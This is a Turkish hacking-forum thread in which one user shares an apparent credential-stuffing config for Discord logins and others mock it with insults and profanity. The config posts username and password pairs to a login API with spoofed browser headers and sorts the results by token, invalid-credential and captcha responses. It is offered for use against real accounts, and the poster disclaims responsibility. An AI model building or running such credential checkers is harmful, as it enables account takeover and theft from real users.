ben naptım kardeşim niye sorumluyumNOT = BU BİR DİSCORD AÇIĞIDIR SORUMLUSU BEN DEĞİL SİZLERSİN
Mail ip dogrulama ?Link =Linkleri görebilmek için kayıt olmanız gerekmektedir
nasıl çalışır sorusuda x sitesine yapmış olduğum cfg baktım ve asıl olay discord la işlediğini fark ettim yani x sitesine giriş isteği atarken ilk önce discord dan kulanıcı adı ve şifrenizi siz bilmesiniz de doğruluyor giriş isteğinde bulunuyor
NOT = BU BİR DİSCORD AÇIĞIDIR SORUMLUSU BEN DEĞİL SİZLERSİN
seni bağlamazbide leaks.ripi niye x yaptın
denemedim hiç mail doğrulaması olanlarıMail ip dogrulama ?
ne var tam olarak bana bi söğle loliye bakar gülen mal ilk defa görüyorumda o yüzden yanlış anlama çalışmasa bişey demicem çalışıyo flame atma#login_post REQUEST POST "Linkleri görebilmek için kayıt olmanız gerekmektedir"
CONTENT "{\"login\":\"<USER>\",\"password\":\"<PASS>\",\"undelete\":false,\"gift_code_sku_id\":null}"
CONTENTTYPE "application/json"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Failure OR
KEY "Giri\\u015f veya \\u015fifre ge\\u00e7ersiz"
KEY "{\"captcha_key\":[\"captcha-required\"],\"captcha_sitekey\":\""
KEYCHAIN Success OR
KEY "\"token\":\""
DÖĞFÜGĞSDLGFLĞÜG9LDFSLPĞÜÜLĞSFSFĞÜGSÜĞGSÜĞLGSDĞÜASLĞÜFĞADAD AĞLIYORUM AMK YA BİDE PAYLAŞMIŞ BUNU
NOT = BU BİR DİSCORD AÇIĞIDIR SORUMLUSU BEN DEĞİL KULANAN SİZLERSİNİZne var tam olrak bana bi söğle loliye bakar gülen mal ilk defa görüyorumda oyüzden yanlış anlama çalışmasa bişey demicem çalışıyo flame atma
anlaşılıyo zaten bilgin sıfır taamm uza şimdi bişey bulamadı cfg de şimdide NOT kısmına fln fsfsfsfsfsfsfs sizin gibiler niye varki anlamadım neyse boş vakit kaybı olarak gördüğüm mal insansınNOT = BU BİR DİSCORD AÇIĞIDIR SORUMLUSU BEN DEĞİL KULANAN SİZLERSİNİZ
şunu okuyup nasıl bir gerizekalı oldugunu anladım configi açmaya tenezzül etmedim ve notepadden baktım
kardeşim daha dün başlamışsın yüksek ihtimal config yapmaya login apisine req atıp keycheck koyan bir dümbüksün attığın randoma bak bide api bulmak zor falan demişsin sanki bulduğun api priv bide proxyless yazmışsın ondada gerizekalısın he + bunların hepsini geç mail onay olmadan nasıl gireceksin hesaba yazık sana amk KFPĞSDOKPĞFAOKPĞDSĞOFDLSFALĞASFLĞSAFĞDLDASFĞLAFDSFLDSFDSFDSAĞÜDFSĞAĞLAÜ git kendini geliştir oğlum benim.anlaşılıyo zaten bilgin sıfır taamm uza şimdi bişey bulamadı cfg de şimdi NOT kısmına fln fsfsfsfsfsfsfs sizin gibiler niye varki anlamadım neyse boş vakit kaybı olarak gördüğüm mal insansın